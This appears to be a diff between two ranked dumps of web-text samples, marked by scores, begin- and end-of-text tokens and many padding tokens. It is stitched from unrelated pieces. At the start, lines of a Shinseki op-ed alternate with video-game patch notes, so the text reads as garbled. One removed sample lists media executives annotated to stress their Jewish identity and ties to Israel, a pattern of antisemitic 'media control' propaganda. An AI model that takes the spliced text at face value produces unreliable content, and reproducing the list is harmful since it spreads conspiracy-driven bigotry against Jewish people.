ul­ti­mately re­spons­ible. While the Vet­er­ans Ad­min­is­tra­tion has been a ma­na­geri­al bleed­ing sore for years, the chaos and per­haps crimin­al­ity at sub­or­din­ate ech­el­ons of the VA on Shin­seki’s watch made his sur­viv­al im­possible. -Added some improved Marauder combat vocals. +But let’s not for­get that Ric Shin­seki is not just a highly dec­or­ated com­mand­er and wounded war­ri­or, los­ing part of his foot in Vi­et­nam and claw­ing his way back onto act­ive duty against the wishes of Army brass. He’s a truth-tell­er of the first rank — and that dis­play of char­ac­ter so en­raged the George W. Bush de­fense team that he en­countered some of the shab­bi­est treat­ment an of­ficer and a gen­tle­man has ever en­countered dur­ing my 46 years serving in and hanging around the Pentagon. -Added improved Marauder comment dialogue. +It didn’t help his case with the Bush­ies that Bill Clin­ton had ap­poin­ted him Army chief of staff. Moreover, De­fense Sec­ret­ary Don­ald Rums­feld, who didn’t en­joy be­ing chal­lenged, quickly took a dis­like to Shin­seki after sev­er­al policy and strategy dis­agree­ments. -Added new ranger dialogue and improved some existing ones. +Rummy was so in­tent on pun­ish­ing Shin­seki out, in fact, that he dir­ec­ted one of his flack-shop aco­lytes to leak word of his re­place­ment to The New York Times — 15 months be­fore Shin­seki’s four-year term was up. -Overhauled the audio of +This had the in­stant ef­fect of ren­der­ing Shin­seki a lame duck with­in the E-ring, the Pentagon’s power cor­ridor. It was cheesy, petty, shame­ful, ================================================================================ -Rank = 64; Score = 4390912.0 -<|begin_of_text|>Janice Fiamengo by +Rank = 64; Score = 2408448.0 +<|begin_of_text|>Kady O’Malley is joining Maclean’s to cover the Manning Conference, hosted by Canada’s leading think tank for the right. She’ll be filing frequently over the course of the two-day conference—keep track at her Manning Manifests page, here. Watch the broadcast live all weekend here. -T +Well, let’s start with the positive: the Manning Centre organizers kept their promise to deliver a “unique” debate experience, at least in contrast to the majority of the fourteen-wide face-offs that have characterized the race so far. -he election of Donald J. Trump revealed a bitterly divided nation and a large body of voters fed up with the status quo: fed up with a perennially ailing economy and a shrinking middle class; fed up with an overly intrusive state that crippled businesses with innumerable regulations and sought to redistribute wealth; fed up with a massively burdensome and insupportable debt; fed up with a president mentored by revolutionaries and malcontents who seemed not to like ordinary Americans much if at all; fed up with a leader who paid court to hostile foreign powers while alienating or outright betraying America's traditional allies; fed up with a president who spoke of heartland Americans as bitter people who cling to their guns or religion or bigotry; fed up with a president who told business owners "You didn't build that," called the Fort Hood terrorist attack an episode of workplace violence, and announced at the United Nations that the future must not belong to those who slander the prophet of Islam; and most of all, perhaps, fed up with an administration that placed the whole country in thrall to political correctness, making a range of important subjects off-limits for discussion on pain of job loss or public disgrace. Many of these voters felt that America had changed beyond all recognition, had lost its core values, and that neither Republican nor Democrat politicians offered any real resistance to that, or even seemed to notice.Donald Trump promised to change everything: to make America great again; to revive American industry; to put Americans back to work and make it possible for them to feed their families and to have prosperity once again; to reduce burdensome taxes and over-regulation of businesses; to renew American patriotism and the traditional family; to stop pretending that children do just as well without a father and money; to stop pretending that masculinity is toxic; to make it acceptable and normal once more to love God and to celebrate America's Judeo-Christian heritage; to decrease the mass immigration that is changing the face of America for the worse; to root out the Muslim Brotherhood sympathizers who have been given key positions in the American administration; to halt illegal immigration and to put a stop to the sanctuary cities that make a mockery of American laws; to rebuild the American military and to signal American power, not acquiescence, to America's foes; to honor American veterans in a manner appropriate to their service; to renew ties with America's traditional allies; and to vigorously protect America from domestic and foreign terrorism. Perhaps most importantly, he promised to make +Instead of lining the stage from curtain to curtain with candidates, they drew names from a hat and called them on stage in groups—two groups of four and two groups of three—with one topic per mini-slot, complete with answers, rebuttals and even the occasional outbursts of direct interaction between the candidates. + +Serving as moderator was the inimitable Tom Clark, who signed off his journalistic duties at Global News earlier this year to take up a government relations gig at Global Public Affairs, but handled his brief return to the interview chair with ease and obvious enjoyment, even—or possibly especially—when he was obliged to cut the mic on an overly loquacious contestant. + +(Those TV host reflexes stay sharp for at least a few months after hanging up the earpiece, apparently.) + +What was clear, however, from the post-debate chatter at the meet-the-candidate reception that capped off the official conference activities for the day, was that it still wasn’t enough to knock the contestants off script and into the sort of spontaneous, off-the-cuff exchange of views that can, in a nanosecond, change the course of a campaign and, eventually, Canadian political history. + +Forget “no knockout punches”—except for a few brief back-and-forths over health care (Chris Alexander and Kellie Leitch), trade negotiations (Lisa Raitt and Maxime Bernier) and the Canadian bona fides of Kevin O’Leary (O’Leary, Andrew Scheer and Deepak Obhrai)—the candidates were far too focused on delivering their now familiar applause and laugh lines. + +Leitch reminded everyone of her plan for face-to-face screenings at border crossings. Scheer praised pipelines. Chong defended his proposal for a “revenue neutral carbon tax.” Bernier decried supply management. O’Leary raged over deficits and taxes—particularly provincial. Andrew Saxton reminded everyone he was, and is, a businessman. Brad Trost and Pierre Lemieux—who, by ================================================================================ -Rank = 65; Score = 4390912.0 +Rank = 65; Score = 2392064.0 <|begin_of_text|>LexisNexis Group is a corporation providing computer-assisted legal research (CALR) as well as business research and risk management services.[2][3] During the 1970s, LexisNexis pioneered the electronic accessibility of legal and journalistic documents.[4] As of 2006, the company has the world's largest electronic database for legal and public-records related information.[5] History [ edit ] @@ -1487,13 +1465,35 @@ The story of LexisNexis starts in western Pennsylvania in 1956, when attorney Jo In 1968, paper manufacturer Mead Corporation purchased Data Corporation for $6 million to gain control of its inkjet printing technology.[10] Mead hired the Arthur D. Little firm to study the business possibilities for the Data Central technology.[10] Arthur D. Little dispatched a team of consultants to Ohio led by H. Donald Wilson.[11] Mead asked for a practicing lawyer on the team, so the team included Jerome Rubin, a Harvard-trained attorney with 20 years of experience.[12] The resulting study concluded that the nonlegal market was nonexistent, the legal market had potential, and OBAR needed to be rebuilt to profitably exploit that market.[12] At the time, OBAR searches often took up to five hours to complete if more than one user was online, and its original terminals (replaced with CRT text terminals in 1970) were noisy Teletypes with slow transmission rates of 10 characters per second.[13] OBAR also had quality control issues; Rubin later recalled that its data was “ ================================================================================ -Rank = 66; Score = 4358144.0 -<|begin_of_text|>MORTIMER ZUCKERMAN, owner of NY Daily News, US News & World Report and chair of the Conference of Presidents of Major Jewish American Organizations, one of the largest pro-Israel lobbying groups. LESLIE MOONVES, president of CBS television, great-nephew of David Ben-Gurion, and co-chair with Norman Ornstein of the Advisory Committee on Public Interest Obligation of Digital TV Producers, appointed by Clinton. JONATHAN MILLER, chair and CEO of AOL division of AOL-Time-Warner NEIL SHAPIRO, president of NBC News JEFF GASPIN, Executive Vice-President, Programming, NBC DAVID WESTIN, president of ABC News SUMNER REDSTONE, CEO of Viacom, "world's biggest media giant" (Economist, 11/23/2) owns Viacom cable, CBS and MTVs all over the world, Blockbuster video rentals and Black Entertainment TV. MICHAEL EISNER, major owner of Walt Disney, Capitol Cities, ABC. RUPERT MURDOCH, Owner Fox TV, New York Post, London Times, News of the World (Jewish mother) MEL KARMAZIN, president of CBS DON HEWITT, Exec. Director, 60 Minutes, CBS JEFF FAGER, Exec. Director, 60 Minutes II. CBS DAVID POLTRACK, Executive Vice-President, Research and Planning, CBS SANDY KRUSHOW, Chair, Fox Entertainment LLOYD BRAUN, Chair, ABC Entertainment BARRY MEYER, chair, Warner Bros. SHERRY LANSING. President of Paramount Communications and Chairman of Paramount Pictures' Motion Picture Group. HARVEY WEINSTEIN, CEO. Miramax Films. BRAD SIEGEL., President, Turner Entertainment. PETER CHERNIN, second in-command at Rupert Murdoch's News. Corp., owner of Fox TV MARTY PERETZ, owner and publisher of the New Republic, which openly identifies itself as pro-Israel. Al Gore credits Marty with being his "mentor." ARTHUR O. SULZBERGER, JR., publisher of the NY Times, the Boston Globe and other publications. WILLIAM SAFIRE, syndicated columnist for the NYT. TOM FRIEDMAN, syndicated columnist for the NYT. CHARLES KRAUTHAMMER, syndicated columnist for the Washington Post. Honored by Honest Reporting.com, website monitoring "anti-Israel media." RICHARD COHEN, syndicated +Rank = 66; Score = 2375680.0 +<|begin_of_text|>This book has gotten a lot of flack for two reasons: (1) A number of people were upset by the large amount of errata posted after the book came out. (2) A number of people were upset by the perceived power-creep that this book carried with it, especially in the archetype section. + +Both of these are reasonable complaints that I largely agree with. + +That said, this book also contains a cornucopia of player options that are great fun. A number of the classes it introduced are now mainstream: it’s hard to imagine playing the game without options like the Brawler, the Investigator, the Slayer, the Bloodrager, the Hunter, or the Warpriest. Or to play without archetypes like the Bolt Ace (Gunslinger), Mutation Warrior or Martial Master (Fighter). + +Moreover, the book introduced a number of feats that improve on the available build options available to most players (Extra Hex! Slashing Grace!). Likewise, although the spells in this book seem to have flown under the radar, there are a lot of nice and interesting spells are introduced in this book (Glue Seal, Communal Align Weapon, Wall of Blindness/Deafness, Wall of Nausea, Anti-Incorporeal Shell, Adjustable Disguise, Adjustable Polymorph, Investigative Mind, etc). + +Easily 5 stars worth of good material here. Given the unusually large amount of errata, I feel compelled to deduct a star. But all that said, it’s hard to imagine playing Pathfinder without this book -- after the Core Rulebook and Advanced Players Guide, it’s probably the best book for players to pick up.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 67; Score = 4358144.0 -<|begin_of_text|>California marked the month-long celebration Sikh Awareness Month (SAAM) celebrations for the fifth year in a row. With Donald Trump's the US President-elect, this year's awareness month could potentially be the most important SAAM to date, as the future of Sikh Americans hangs in the balance, said Sikh Coalition community development manager Harjit Kaur. She said minority communities across the nation have experienced an uptick in hate crimes, bullying, and discrimination as a result of the current political climate.A series of Sikh-related events were organised through the month, from local activities in schools to collaborating with the basketball team, the Los Angeles Clippers.Sikh Coalition community development manager Harjit Kaur explains how it all came about. “Since November 2010, California community leaders have engaged with legislators to recognize the contribution of Sikh Americans to California and to provide a platform to create aware ness about Sikhs in California educational institutions and the community.“ Harjit elaborates, “This year, Assembly member Jim Cooper presented Dr Onkar Singh Bindra and me with the state member resolution celebrating Sikh Awareness and Appreciation Month. California state superintendent of public instruction Tom Torlakson also recognised November as the awareness month for California's public schools. Sikh Awareness and Appreciation resolutions have been passed in Yuba City, Fresno, San Jose, Bakersfield, Fremont, Santa Cruz, and Santa Clara, along with numerous school districts across the state.The Sikh Coalition, along with many volunteers, has delivered presentations to hundreds of Californians across the state in classrooms and local libraries.The Sikh Coalition also co-hosted a Sikh Awareness and Appreciation game with the Los Angeles Clippers.Over 350 Sikh Americans attended the LA Clippers game alongside the other 19,000 spectators. It also featured the US national anthem by Raaginder `Violinder' Singh on the violin as well as the Los Angeles Sikh Boy Scouts of America colour guard, and half-time entertainment by Da Real Punjabiz.Harjeet said they work tirelessly to ensure that SAAM is used as a platform to meaningfully engage with legislators, educators, and community members across the state to address these issues. “This year, after helping to protect Sikh history in California in July, the Sikh Coalition secured safe passage of AB-2845, a groundbreaking new anti-bullying law in California in September“.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Rank = 67; Score = 2326528.0 +<|begin_of_text|>Following news last week that EPA had allowed for the re-introduction of asbestos into the construction market, architects across the country have lambasted the proposal, calling for a blanket ban on asbestos. In response, the environmental agency has issued the following statement: + +“The EPA accepts the blanket ban on asbestos and will under no circumstances permit the production of asbestos blankets, but other asbestos products may be used where there is significant desire to do so because after all, asbestos is the best osTM #MAGA.” + +In addition to this statement, the EPA released a full list of materials granted SNUR (Significant New Use Rule) status following a year-long safety inquiry. The document can be seen below. + +ENVIRONMENTAL PROTECTION AGENCY + +NOTIFICATION OF SIGNIFICANT NEW USE RULES FOR PROHIBITED MATERIALS: + +Structural Cheese: With asbestos back on the menu, so is cheese. Once again, certain cheeses will be classified as safe for construction. Any cheese harder than an average supermarket cheddar will once again be permitted for use in structural members for public and governmental buildings no larger than a soccer stadium. Many of these cheeses have been consistently described as ‘robust’, ‘extra strong’ and ‘particularly tangy’ and so are clearly suitable for supporting extremely heavy loads. For obvious reasons, mozzarella is banned for construction use in pizza shops and all cheese is banned from mice farms. The EPA would like to clarify that this cheese legislation has nothing to do with the 1.4 billion-pound surplus of cheese in the U.S. + +Napkin Tiling: To combat the wasteful practice of discarding unused restaurant-grade napkins, the EPA will classify them as suitable for tiling bathrooms and wet-rooms. The famous slogan “one sheet does plenty” clearly applies to the use of napkins as bathroom tiles, and they are marketed as “super-absorbent” so are perfect for use in areas that tend to get excessively wet. They are also often folded into the shape of boats, or swans, so are clearly waterproof. Napkins with scribbles and doodles on them will not be permitted. + +Chocolate Fire Doors: In order to drastically cut deforestation in North America the EPA proposes to drastically increase deforestation in South America. This can be done by doubling chocolate production in South American countries. This surplus chocolate will be used in the construction of fire-rated door sets. In the event of a fire, conventional timber doors catch fire, and fire is well known to be the leading cause of fire. Chocolate ================================================================================ -Rank = 68; Score = 4358144.0 +Rank = 68; Score = 2326528.0 <|begin_of_text|>Image copyright Google Image caption Police said the man was in the shop after withdrawing money from a nearby cash machine A woman who kept a £20 note she found in a shop has been convicted of theft. @@ -1520,41 +1520,59 @@ Ch Insp Karen Stevenson, from Staffordshire Police, urged anyone who finds lost Correction 2 March 2017: An earlier version of this story contained an image of the wrong shop. This has now been amended.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 69; Score = 4292608.0 -<|begin_of_text|>The great comedian Milton Berle had a powerful put-down for the many acts that auditioned for his show but failed to make the grade. “High school,” he’d call them. And I can’t think of a better term to describe the Conservative campaign brain trust at the midpoint of this long election season. +Rank = 69; Score = 2310144.0 +<|begin_of_text|>USA Soccer 2016 Logo -Just lately, for example, the campaign seems to be having a tiny problem with geography. Last Friday, a Harper tweet provided a lovely snapshot of Little Crater Lake in the state of Oregon to illustrate its commitment to the Canadian great outdoors. Earlier in the week, a campaign spot talked about shipbuilding in Halifax, N.S. … against a backdrop of Johnstown, Ont. A group of Colombian miners sat in for a party ad promoting a mineral exploration tax credit. And then there was the Tory ad which misidentified a B.C. salmon as its Atlantic cousin — the online trolls are still chuckling over that one. +The US Soccer national team today finally unveiled its new logo. Following the design language established by the overwhelmingly popular centenary crest, the new US Soccer logo boasts the US national teams' iconic navy and red in a sleek arrangement. This is the new US Soccer badge, introduced on February 29, 2016.Drawing inspiration from the previous US Soccer logo's badge shape, the new USA national team crest simplifies a lot elements of the old crest, while also shifting the colors to darker and less cartoony shades of blue and red.The three stars and the ball from the 1993 crest have been ditched, making place for a bold navywriting at the top of the badge. Dynamic red stripes adorn the lower half of the new USA soccer logo.Barely changed since its creation in 1993 and often mocked for its outdated 1990s look, the US Soccer badge has been in need for a redesign for a long time. Building on the success of the centenary crest seems a very viable and logical decision, in the interest of the US national team's fans.After Nike and US Soccer renewed their kit supplier contract until 2022, the two worked side by side on the new US Soccer badge, which is set to be first used on the new United States 2016 Home and Away Kits. The new USA Jerseys are set to be worn at the first-ever Copa America on US-soil, the 2016 centenary tournament.What do you think of the new 2016 USA national team logo? Drop us a line below.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 70; Score = 2310144.0 +<|begin_of_text|>Rodrigo Varela/ESPN Images Have you ever seen Stugotz at Hooters? Have you ever seen Stugotz at Hooters? -Well, these things happen. So do things like a sudden drop in the polls to third place. If that’s not a wakeup call, I don’t know what qualifies. +Midwest Region -It all made me think of an incident in the 2000 campaign, when Canadian Alliance Leader Stockwell Day lamented that Canadian talent and brains were heading south to the U.S., “just like the Niagara River.” The message was sound, the words were not; the Niagara actually flows northward. +#1) Kentucky: Jeff Van Gundy - Queen of Hearts -Day took a lot of ungentle ribbing for that error — but his mistakes fade in comparison to the fiasco in the Big Blue Bus these days. There’s one common thread that links Day’s experience in 2000 to what Harper is going through right now: a profound sense of confusion on the ground. But that’s where the similarities end. +#2) Kansas: George Karl- Leader of a nudist colony -I worked on the Day campaign as legislative assistant to a front-bench MP. For the Alliance, the 2000 election was an unwelcome surprise from PM Jean Chretien, who always knew how to catch his opponents off guard. The CA had just been through a highly divisive leadership campaign and the party was low on funds. There was little corporate support for the party and many influential backers were waiting to see whether the Alliance could really replace the Progressive Conservatives as a centre-right alternative to the Liberals. Day fought that campaign on a shoestring, with family members playing key roles in the process. +#3) Notre Dame: Nene - Looks like a gladiator that will help you slay a tiger then join you as you embark on a quest -The Conservative party is having more and more difficulty recruiting volunteers at the riding level. Even campaign stalwarts who show up for every election are finding reasons to stay home this time. Who -================================================================================ -Rank = 70; Score = 4292608.0 -<|begin_of_text|>This article was originally published April 20, 2016, at 1:14 p.m. EST. It has been updated to include comments from Sen. John McCain. +#4) Maryland: J.J. Redick - Sketchy car valet who might take your car for a joy ride -WASHINGTON — Pentagon acquisition chief Frank Kendall, in congressional testimony Wednesday, defended the controversial path to end the US reliance on Russian rocket engines for military space launch—and Senate appropriators signaled their continued support. +#5) West Virginia: Mike Dunleavy Jr. - Looks like a generic police sketch -That path, for now, involves using more of the engines while the industrial base ramps up to offer competing engines. DoD could replace the RD-180 engines by 2021 at the soonest, but the politicization of the issue is slowing down needed Congressional action, Kendall, the undersecretary of defense for acquisition, technology and logistics, said at a Senate Appropriations Defense Subcommittee hearing Wednesday. +#6) Butler: Andy Reid - Looks like he waggles his fingers in front of a tray of doughnuts and says, "Don't mind if I do" -"It's a complicated issue, but the [Defense] Department's goals have never changed, to develop two engines, so if one of them has a failure, and we have a big gap in capability, we still have access to space," Kendall said. "We need competition to keep the expense down." +#7) Wichita State: Marcin Gortat - Guy who becomes a YouTube sensation by wrestling bears shirtless -Ultimately, DoD will seek public-private partnerships for reasonably priced launch services, versus buying a lone replacement engine and subsidizing a single company, Kendall said. Replacing the Atlas V with a combination of ULA's Delta IV heavy launch system would cost, Kendall said, as much as $50 million per launch. +#8) Cincinnati: Kris Humphries - Looks like a male cheerleader -"It would be over $1 billion out of our defense budget to get us off RD-180s, and I don't think that's a good tradeoff," Kendall said. +#9) Purdue: Russell Wilson - Looks like a male cheerleader -The US Air Force contracts for launch services with United Launch Alliance, a joint venture of Boeing and Lockheed Martin, which uses the RD-180 rocket engine to power its Atlas V launch vehicles. SpaceX is ULA's main competition for Pentagon business, as the company's Falcon 9 rocket won certification last year to compete for military space launches. +#10) Indiana: Jerry Sloan - Looks like he washes his hair with a bar of soap -× Fear of missing out? Fear no longer. Be the first to hear about breaking news, as it happens. You'll get alerts delivered directly to your inbox each time something noteworthy happens in the Military community. Thanks for signing up. By giving us your email, you are opting in to our Newsletter: Sign up for our Early Bird Brief +#11) Texas: David Shaw - Looks like the president in a cable television network drama -For their support of DoD's plan, two key appropriators, the SAC-D's ranking member, Sen. Richard Durbin, D-Ill., and subpanel member Sen. Richard Shelby, R-Ala., have attracted the ire of the Senate's lead authorizer, Senate Armed +#12) Buffalo: Nick Saban - Guy who runs a lap, looks at his stopwatch and says, "Still go it," while snapping his fingers + +#13) Valparaiso: Frank Vogel - Guy who keeps calling you to hang out and you keep creating excuses not to go + +#14) Northeastern: Trey Wingo - Looks like a guy who owns a funeral home and does late-night infomercials promoting his seasonally discounted rates + +#15) New Mexico State: DeAndre Jordan - Looks like a cartoon moose + +#16) Hampton: Chip Kelly - Looks like the guy who leaves comically low tips to service people, then shoots the finger gun and says, "Don't spend it all in one place" + +#16) Manhattan: Chip Kelly - Looks like the guy who washes his yacht shirtless + +West Region + +#1) Wisconsin: Ron Rivera - Guy who wears a lei for his entire vacation in Hawaii + +#2) Arizona: Jack Del Rio - Stepdad who tries too hard to be called dad + +#3) Baylor: Orel Hershiser - Looks like the father in the picture of ================================================================================ -Rank = 71; Score = 4227072.0 +Rank = 71; Score = 2310144.0 <|begin_of_text|>Minecraft News Powered by Tumblr Minecraft Beta 1.3 * Implemented a new lighting engine with the help of MrMessiahs (can be turned off) * Changed the options around, added a new “Graphics options” button @@ -1577,521 +1595,551 @@ Rank = 71; Score = 4227072.0 *.. and a bunch of bug fixes and 